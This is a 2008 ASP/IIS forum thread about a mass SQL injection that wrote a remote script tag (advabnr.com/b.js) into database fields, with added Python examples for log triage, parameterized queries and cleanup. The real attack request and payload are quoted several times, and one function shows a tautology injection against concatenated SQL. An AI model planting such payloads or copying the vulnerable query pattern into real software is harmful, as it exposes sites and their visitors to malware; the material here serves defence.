SQL Injection

#1
06-16-2008, 05:27 PM
shank

Microsoft Inet server asp, iis, ftp, smtp and security related discussions
SQL Injection

- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
GET /sresult.asp
title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=
http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

My table was evidently hit with SQL Injection. I searched the IIS logs and
found hundreds of the below instances. Questions...

1) The end result was my image columns were updated to reflect:
Original data: files/icons/ps987_75.jpg
Updated data: files/icons/ps987_75.jpg<script
src=http://www.advabnr.com/b.js></script>
Thousands of records were updated like the above.
I tried downloading http://www.advabnr.com/b.js to see what's inside, but it
wasn't available.
What could have been in the js file to cause such an update?

2) I don't see how they could have known the Table name or the column names.
Same question as #1 I guess.

3) I was and still am using a stored procedure on that page to SELECT from
the table. How do I stop similar malicious efforts from happening again?

thanks


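Triage of the log entries shank describes, added here as an example that is not part of the original thread: it parses IIS W3C extended log lines, URL-decodes every query-string parameter and reports which parameter carried a script tag and from which client. The #Fields order is an assumption (the post shows the line without a date/time prefix); the first entry reuses the request from the post, the other three lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed IIS W3C extended log excerpt. The #Fields order is an assumption
# (the post shows the line without its date/time prefix); entry 1 reuses the
# request from the post, entry 4 is a constructed second hit from the same client.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version
2008-06-16 17:02:11 GET /sresult.asp title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
2008-06-16 17:02:15 GET /sresult.asp title=Higher&artist=McDonald&type=%25&category=%25&column=t_asc 80 - 192.0.2.10 HTTP/1.1
2008-06-16 17:03:40 GET /default.asp - 80 - 192.0.2.11 HTTP/1.1
2008-06-16 17:05:02 GET /sresult.asp title=x&artist=y&type=%25&category=%25&column=a_asc%3Cscript%20src=http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
"""

# Matches an opening script tag in the already URL-decoded parameter value.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per request, keyed by the names from the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # skip malformed lines rather than mis-assign columns
        yield dict(zip(fields, parts))


def tainted_params(query):
    """Names of query-string parameters whose decoded value contains a script tag."""
    if query == "-":          # W3C placeholder for an empty field
        return []
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if SCRIPT_TAG.search(value)]


def triage(text):
    """Return ([(client ip, uri-stem, parameter)], Counter of hits per client)."""
    findings = []
    for rec in parse_w3c(text):
        for name in tainted_params(rec["cs-uri-query"]):
            findings.append((rec["c-ip"], rec["cs-uri-stem"], name))
    return findings, Counter(ip for ip, _, _ in findings)


if __name__ == "__main__":
    hits, per_client = triage(SAMPLE_LOG)
    for ip, stem, param in hits:
        print("%s  %s  parameter=%s" % (ip, stem, param))
    print("hits per client:", dict(per_client))
```

Decoding before matching matters: the tag in the log is stored percent-encoded (`%3Cscript`), so a plain text search for `<script` over the raw file misses it. Grouping by parameter name also tells you which input the page failed to handle, which is where the fix in the ASP code has to go.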
#2
06-16-2008, 06:37 PM
Bob Barrows [MVP]

Re: SQL Injection

shank wrote:
> - - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - -
> GET /sresult.asp
> title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src=
> http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> My table was evidently hit with SQL Injection. I searched the IIS
> logs and found hundreds of the below instances. Questions...
>
> 1) The end result was my image columns were updated to reflect:
> Original data: files/icons/ps987_75.jpg
> Updated data: files/icons/ps987_75.jpg<script
> src=http://www.advabnr.com/b.js></script>
> Thousands of records were updated like the above.
> I tried downloading http://www.advabnr.com/b.js to see what's inside,
> but it wasn't available.
> What could have been in the js file to cause such an update?
>

http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
http://www.nextgenss.com/papers/adva..._injection.pdf
http://www.nextgenss.com/papers/more..._injection.pdf


> 2) I don't see how they could have known the Table name or the column
> names. Same question as #1 I guess.


Same answer - by causing error messages that poor coding practice allows to
be returned to the user.
>
> 3) I was and still am using a stored procedure on that page to SELECT
> from the table. How do I stop similar malicious efforts from happening
> again?


Use parameters:
http://groups.google.com/group/micro...fedf4e1efd63a6


--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"


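Bob's "use parameters" advice, shown as an added example that is not from the thread: the same search written once with string concatenation and once with bound parameters. The table, its columns, the rows and the sort-key names are constructed, and sqlite3 stands in for SQL Server. The `column` parameter in shank's URL selects a sort order, and an ORDER BY target cannot be passed as a parameter, so that input goes through a fixed allowlist instead.

```python
import sqlite3

# Allowlist for the "column" sort parameter seen in the request URL. The key
# names and column mappings are assumptions; the real page's schema is unknown.
ORDER_COLUMNS = {
    "t_asc": "title ASC", "t_desc": "title DESC",
    "a_asc": "artist ASC", "a_desc": "artist DESC",
}


def make_db():
    """In-memory stand-in for the table behind sresult.asp, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE songs (title TEXT, artist TEXT, icon TEXT)")
    conn.executemany("INSERT INTO songs VALUES (?, ?, ?)", [
        ("Higher And Higher", "Jackie Wilson", "files/icons/ps1_75.jpg"),
        ("Yah Mo B There", "Michael McDonald", "files/icons/ps2_75.jpg"),
        ("Sweet Freedom", "Michael McDonald", "files/icons/ps3_75.jpg"),
    ])
    return conn


def search_unsafe(conn, artist, order_key):
    """The vulnerable pattern: request values spliced into the SQL text, so a
    quote in `artist` ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT title, artist FROM songs WHERE artist = '" + artist
           + "' ORDER BY " + order_key)
    return conn.execute(sql).fetchall()


def search_safe(conn, artist, order_key):
    """Hardened form: `artist` is bound as a parameter and is only ever data;
    the ORDER BY target is taken from the allowlist, never from the request."""
    order_by = ORDER_COLUMNS.get(order_key)
    if order_by is None:
        raise ValueError("unknown sort key: %r" % order_key)
    sql = "SELECT title, artist FROM songs WHERE artist = ? ORDER BY " + order_by
    return conn.execute(sql, (artist,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("unsafe:", search_unsafe(db, tautology, "title"))   # every row comes back
    print("safe:  ", search_safe(db, tautology, "t_asc"))     # no artist has that name
```

In classic ASP the same split applies: values go through `ADODB.Command` parameters (or the stored procedure's own parameters), and anything that has to become part of the statement text, such as a sort column, is looked up in a table the page controls.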
#3
06-16-2008, 08:21 PM
Old Pedant

Re: SQL Injection



"Bob Barrows [MVP]" wrote:
> shank wrote:
> > 2) I don't see how they could have known the Table name or the column
> > names. Same question as #1 I guess.

>
> Same answer - by causing error messages that poor coding practice allows to
> be returned to the user.


No, not really. Oh, it's poor coding practice, but the original injection
(not seen here) is code that goes and reads the system tables and tries to
discover all user table names and all user VARCHAR, NVARCHAR, TEXT, NTEXT
field names and *THEN* injects the JavaScript into all those fields.

It's pretty sophisticated, actually. But it's easily protected against by
simply disallowing access to the system tables from the IUSR_xxx and IWAM_xxx
accounts. (Well, and of course by practicing good programming of the ASP
page in the first place. But even with poor ASP code, if you set up the DB
correctly the particular attack fails.)

If you care, I think I can find a copy of the actual injection attack code
still lurking, showing how it loops on all the tables and fields.
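Old Pedant describes the injection walking the catalog to find every text column before writing the tag into each one. The same walk, turned around for cleanup and added here as an example that is not from the thread: list the text columns from the catalog, locate every cell that carries the appended script tag, and strip it. sqlite3 stands in for SQL Server, and the tables and rows are constructed from the values quoted in shank's post.

```python
import re
import sqlite3

# The tag appended to the records in the post. The pattern also tolerates other
# src hosts and extra whitespace so one pass covers variants of the same payload.
INJECTED_TAG = re.compile(r"<script\b[^>]*>\s*</script>", re.IGNORECASE)
TEXT_TYPES = ("TEXT", "VARCHAR", "NVARCHAR", "CHAR", "NCHAR", "NTEXT")


def make_db():
    """Constructed stand-in for the affected database: two tables, several text columns."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE songs (id INTEGER PRIMARY KEY, title TEXT, icon VARCHAR(255), plays INTEGER);
        CREATE TABLE artists (id INTEGER PRIMARY KEY, name TEXT, bio TEXT);
        INSERT INTO songs VALUES (1, 'Higher And Higher',
            'files/icons/ps987_75.jpg<script src=http://www.advabnr.com/b.js></script>', 10);
        INSERT INTO songs VALUES (2, 'Sweet Freedom', 'files/icons/ps988_75.jpg', 3);
        INSERT INTO artists VALUES (1,
            'Michael McDonald<script src=http://www.advabnr.com/b.js></script>', 'Singer');
    """)
    return conn


def q(ident):
    """Quote an identifier taken from the catalog so it cannot alter the statement."""
    return '"' + ident.replace('"', '""') + '"'


def text_columns(conn):
    """(table, column) pairs whose declared type is a text type, read from the catalog."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    cols = []
    for table in tables:
        for _cid, name, decl_type, *_rest in conn.execute("PRAGMA table_info(%s)" % q(table)):
            # Strip a length suffix such as VARCHAR(255) before comparing the type name.
            if (decl_type or "").upper().split("(")[0] in TEXT_TYPES:
                cols.append((table, name))
    return cols


def find_injected(conn):
    """(table, column, rowid) for every text cell that contains the script tag."""
    hits = []
    for table, col in text_columns(conn):
        sql = "SELECT rowid, %s FROM %s WHERE %s LIKE ?" % (q(col), q(table), q(col))
        for rowid, value in conn.execute(sql, ("%<script%",)):
            if value is not None and INJECTED_TAG.search(value):
                hits.append((table, col, rowid))
    return hits


def clean_injected(conn):
    """Strip the tag from every affected cell; return the number of cells repaired."""
    repaired = 0
    for table, col, rowid in find_injected(conn):
        (value,) = conn.execute(
            "SELECT %s FROM %s WHERE rowid = ?" % (q(col), q(table)), (rowid,)).fetchone()
        cleaned = INJECTED_TAG.sub("", value)
        if cleaned != value:
            conn.execute("UPDATE %s SET %s = ? WHERE rowid = ?" % (q(table), q(col)),
                         (cleaned, rowid))
            repaired += 1
    conn.commit()
    return repaired


if __name__ == "__main__":
    db = make_db()
    print("affected cells:", find_injected(db))
    print("repaired:", clean_injected(db))
    print("remaining:", find_injected(db))
```

Run `find_injected` first and keep its output as the record of what was touched; only then run the cleanup, and only on a copy or after a backup, since the regex removes whatever matches the tag in every text column it finds. On SQL Server the catalog walk reads `INFORMATION_SCHEMA.COLUMNS` instead of `sqlite_master` and `PRAGMA table_info`, and it must run as an account that is allowed to see the catalog, which is exactly the permission Old Pedant recommends denying to the web application's own login.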
#4
06-16-2008, 08:33 PM
Old Pedant

How the injection worked...

Here's an example of how it was originally injected into at least one web
site and thus database:

http://www.aspmessageboard.com/forum...997&P=1#894984

The next post is my decoding of that and then Xander's post has a link to
here:
http://isc.sans.org/diary.html?n&storyid=4294
that explains the whole process even more.


#5
06-17-2008, 02:06 AM
Mike Brind [MVP]

Re: How the injection worked...


"Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
> Here's an example of how it was originally injected into at least one web
> site and thus database:
>
> http://www.aspmessageboard.com/forum...997&P=1#894984
>
> The next post is my decoding of that and then Xander's post has a link to
> here:
> http://isc.sans.org/diary.html?n&storyid=4294
> that explains the whole process even more.
>


The interesting thing is that ww.aspfaq.com, which is mentioned in the
thread you linked to appears to have been a victim of something similar.
Google results warn that aspfaq may harm your computer....

--
Mike Brind
Microsoft MVP - ASP/ASP.NET


#6
06-17-2008, 02:24 AM
Mike Brind [MVP]

Re: How the injection worked...


"Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>
> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>> Here's an example of how it was originally injected into at least one web
>> site and thus database:
>>
>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>
>> The next post is my decoding of that and then Xander's post has a link to
>> here:
>> http://isc.sans.org/diary.html?n&storyid=4294
>> that explains the whole process even more.
>>

>
> The interesting thing is that ww.aspfaq.com, which is mentioned in the
> thread you linked to appears to have been a victim of something similar.
> Google results warn that aspfaq may harm your computer....
>


Ah. Not the one mentioned in the thread (which is plural).... but the one
that is frequently linked to from here.



#7
06-17-2008, 05:53 AM
Bob Barrows [MVP]

Re: SQL Injection

Old Pedant wrote:
> "Bob Barrows [MVP]" wrote:
>> shank wrote:
>>> 2) I don't see how they could have known the Table name or the
>>> column names. Same question as #1 I guess.

>>
>> Same answer - by causing error messages that poor coding practice
>> allows to be returned to the user.

>
> No, not really. Oh, it's poor coding practice, but the original
> injection (not seen here) is code that goes and reads the system
> tables and tries to discover all user table names and all user
> VARCHAR, NVARCHAR, TEXT, NTEXT field names and *THEN* injects the
> JavaScript into all those fields.


Yes, that's the other way, and it is covered in the links I provided, which
is what I meant by "same answer".

>
> It's pretty sophisticated, actually. But it's easily protected
> against by simply disallowing access to the system tables from the
> IUSR_xxx and IWAM_xxx accounts.


.... or whatever account is being used to connect to sql server.

> (Well, and of course by practicing
> good programming of the ASP page in the first place. But even with
> poor ASP code, if you set up the DB correctly the particular attack
> fails.)
>
> If you care, I think I can find a copy of the actual injection attack
> code still lurking, showing how it loops on all the tables and fields.


I've seen it - I just hadn't put the two cases together

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"


#8
06-17-2008, 07:49 AM
Bob Barrows [MVP]

Re: How the injection worked...

Mike Brind [MVP] wrote:
> "Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
> news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>>
>> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
>> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:
>>>
>>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>>
>>> The next post is my decoding of that and then Xander's post has a
>>> link to here:
>>> http://isc.sans.org/diary.html?n&storyid=4294
>>> that explains the whole process even more.
>>>

>>
>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>> the thread you linked to appears to have been a victim of something
>> similar. Google results warn that aspfaq may harm your computer....
>>

>
> Ah. Not the one mentioned in the thread (which is plural).... but
> the one that is frequently linked to from here.


Oh my! That is embarrassing! I know Aaron used to recommend the use of
dynamic sql to execute stored procedures ... I'm sure he followed what
he preached, but I would have thought he knew to use a
limited-privileges account to connect to SQL. I'm going to give him the
benefit of the doubt and place the blame on the company that bought the
aspfaq site from him.

--
Microsoft MVP -- ASP/ASP.NET
Please reply to the newsgroup. The email account listed in my From
header is my spam trap, so I don't check it very often. You will get a
quicker response by posting to the newsgroup.


#9
06-23-2008, 01:22 PM
Bob Barrows [MVP]

Re: How the injection worked...

Mike Brind [MVP] wrote:
> "Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
> news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>>
>> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
>> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>>> Here's an example of how it was originally injected into at least
>>> one web site and thus database:
>>>
>>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>>
>>> The next post is my decoding of that and then Xander's post has a
>>> link to here:
>>> http://isc.sans.org/diary.html?n&storyid=4294
>>> that explains the whole process even more.
>>>

>>
>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>> the thread you linked to appears to have been a victim of something
>> similar. Google results warn that aspfaq may harm your computer....


They seem to have cleared that up. No more Google warnings there.

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"


#10
06-23-2008, 02:39 PM
Mike Brind [MVP]

Re: How the injection worked...


"Bob Barrows [MVP]" <reb01501--at--NOyahoo.SPAMcom> wrote in message
news:ezUDU4V1IHA.2064--at--TK2MSFTNGP05.phx.gbl...
> Mike Brind [MVP] wrote:
>> "Mike Brind [MVP]" <paxtonend--at--hotmail.com> wrote in message
>> news:ePqbyiE0IHA.2384--at--TK2MSFTNGP04.phx.gbl...
>>>
>>> "Old Pedant" <OldPedant--at--discussions.microsoft.com> wrote in message
>>> news:EFE4B3B6-629A-45D6-9138-FB2C9AC5ADD2--at--microsoft.com...
>>>> Here's an example of how it was originally injected into at least
>>>> one web site and thus database:
>>>>
>>>> http://www.aspmessageboard.com/forum...997&P=1#894984
>>>>
>>>> The next post is my decoding of that and then Xander's post has a
>>>> link to here:
>>>> http://isc.sans.org/diary.html?n&storyid=4294
>>>> that explains the whole process even more.
>>>>
>>>
>>> The interesting thing is that ww.aspfaq.com, which is mentioned in
>>> the thread you linked to appears to have been a victim of something
>>> similar. Google results warn that aspfaq may harm your computer....

>
> They seem to have cleared that up. No more Google warnings there.
>


That is indeed a relief.

Mike

